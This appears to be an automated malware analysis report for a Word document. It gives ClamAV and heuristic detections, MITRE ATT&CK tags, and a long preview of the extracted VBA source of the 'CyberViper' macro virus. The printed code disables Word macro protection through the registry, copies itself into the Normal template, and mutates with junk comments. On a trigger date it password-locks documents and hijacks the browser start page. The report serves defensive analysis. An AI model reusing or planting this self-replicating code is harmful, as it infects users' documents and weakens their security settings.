MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
This OLE file contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, indicating a macro virus. The script attempts to disable macro security by writing to registry keys: 'HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level' and 'HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options\EnableMacroVirusProtection'. It also attempts to export and import a component named 'CyberViper' to 'c:\CV.sys', suggesting an attempt at self-propagation or payload delivery.
Heuristics 5
-
ClamAV: Js.Joke.RJump-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Js.Joke.RJump-1
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18222 bytes |
SHA-256: c49d8cb59ec3fdebef58d67a0999c3b785ef78585a5075dfa440fe8dfe79e60a |
|||
|
Detection
ClamAV:
Js.Joke.RJump-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "CyberViper"
'@¡ä^PÏ9‘™šª
Sub AutoOpen()
'pWåÀ«s²WgvÜ8¡e4E/v
'×v§„†|fpU+Pã,nh�?~S�Œ?
Rem Macro.Word97.CyberViper
Rem Copyright by Wit AKA CyberViper 1999
Rem ( My first macro virus )
Rem ( Stealth, Polimorf )
'4*�ßMeÒ
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
ShowVisualBasicEditor = False
With System
.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = 0&
End With
'C•¨5¢³¼v0ƒ’+r7=^æ˜Vs~,{wÝVB…d†oS- h�Ðt–
With Options
.VirusProtection = (((1 * 1) - 1) / 10)
.SaveNormalPrompt = (((1 * 1) - 1) / 10)
.ConfirmConversions = (((1 * 1) - 1) / 10)
End With
TmpFileName = "c:\CV.sys"
'~ uY¶ÒÄC5">kEãΔ±=S%ż¾bz�À�HIh’d‰u’*�Ià
Call CyberMutate
'3•AÙ3xVζV¦S1&
If ThisDocument = NormalTemplate Then
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "CyberViper" Then GoTo EndFind
'5ç§#“44¿X)[l\ÝãpW@@¡rr
Next I
NormalTemplate.VBProject.VBComponents("CyberViper").Export (TmpFileName)
'e ´ÈW¬pÂ
'Œ‹�1®S+Wàa¡hiaJJt›P©•˜/(>Qo”YÇÓ‰m
ActiveDocument.VBProject.VBComponents.Import TmpFileName
ActiveDocument.Saved = False
Else
'plIÏ>p™�±8`!¼Ø[MÞEsh`㓉:Ó&¾
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
'¸”™U…¾Ë2Œs.z«ƒqÝä–Š›1DX#>t��¼(q+^˜‡—aÕº“
If NormalTemplate.VBProject.VBComponents(I).Name = "CyberViper" Then GoTo EndFind
'¯ÓLgŽgH“�;,žÇ tEƒâ¹l€�¦'¡Ód7uºgrµ
'[O€Rd(€IÌ•¶ÙbŒ0žrà6Øœe= Kæ:%e�Ø‹
'—¹®©¸S�…‘Xsf⇔}&k;¢>Gk3›
'O–¬U““æÚQ¹q�‚ƒ
Next I
'À¦ÕÏs8Þ¿«p#A@…q5W ɃEÓj`ºKyOÏšjmÌ•Ú‡bÍS
Application.VBE.ActiveVBProject.VBComponents("CyberViper").Export (TmpFileName)
NormalTemplate.VBProject.VBComponents.Import TmpFileName
'ižCv?âV+À®R¾ÎäV|Ö
NormalTemplate.Saved = False
NormalTemplate.Save
'5=<
'„äy»]/Ï“ÌÁ¹Ø*ÄMV*ÔåT‹dJH9˜•Ë1Hž|YÆ]âo¾Á
End If
EndFind:
'ar>›3Iª„
'vÇK²ÓKäáΈ¢{? šÊi*…*jz[á"¢šŠ%¯^äZh
'‰V”I/Ó6¢ÔNÝÉx‚¹Æ
Kill TmpFileName
'Ŧ°çcƒr«CtŒÂŒu…M›�¨Ñj\Z>‰L”hÏ F¨µš
If Month(Now()) = 4 And Day(Now()) = 15 Then
ActiveDocument.Password = "-=CyberViper=-"
'@+P·Þe¨¾'¾€I˜ÕÝ¢"¤à!Þ.Z”Á(*�^r
'…BW1ãX›]Ê_¿B\.‚z—&_;a¸�àÅŽ™FÔ
ActiveDocument.Saved = False
'�ªÖÆ
'É-:àÆÄçO¤�
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page") = "file://C:\CV.HTM"
Open "c:\CV.HTM" For Output As #1
'7B)®Š
Print #1, "<HTML><HEAD></HEAD><script LANGUAGE=" + Chr(34) + "JavaScript1.2" + Chr(34) + ">"
Print #1, "a=1;setInterval(" + Chr(34) + "J()" + Chr(34) + ",10);function J(){a=a+.1;"
'œ¡TWÅÄ•åÖM«ä
Print #1, "self.moveBy((Math.random()*a*2 -a),(Math.random()*a*2)-a);}</script></BODY></HTML>"
'z`.q’¸”¢Ás¿°ª²Fº-QÞÃKDOÙSS®¤º·
Close #1
End If
End Sub
Sub FileTemplates()
'·p|‚
Application.EnableCancelKey = wdCancelDisabled
Options.VirusProtection = (((1 * 1) - 1) / 10)
'}µ¶oÔµ1ž®
Options.ConfirmConversions = (((1 * 1) - 1) / 10)
End Sub
'•¤”+È+>_wtË+ÓO*
Sub ToolsMacro()
Call FileTemplates
End Sub
Sub ViewVBCode()
Call FileTemplates
End Sub
Sub AutoClose()
Call AutoOpen
End Sub
Sub AutoNew()
Call AutoOpen
End Sub
Sub FileSaveAs()
'tc¬J(Ñ({³·ÄI}ÍÅr|e
Call AutoOpen
'Ü}°oN˜Ž|¡¹
'žIE”0{ÕT½kYמ�
'“Y\º"¸Â)r̾jàÎ+Ýhˆ¹*–
Dialogs(wdDialogFileSaveAs).Show
End Sub
'/rc®^¿>–ßPÛ6äž—Ô’Q
Sub FileSave()
';(ªÈ‡Àäˆ-�a
Call AutoOpen
ActiveDocument.Save
';¥
End Sub
'ÁHß-,¾k
'‡·À
Sub CyberMutate()
Call ClearRem
For C2 = 1 To 50
U2 = ThisDocument.VBProject.VBComponents("CyberViper").CodeModule.CountOfLines
M1 = Int((U2 * Rnd) + 1)
F4 = Int((40 * Rnd) + 1)
CRem = "'"
'nÄU§
For C3 = 1 To F4
'w·Q
CRem = CRem + C
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.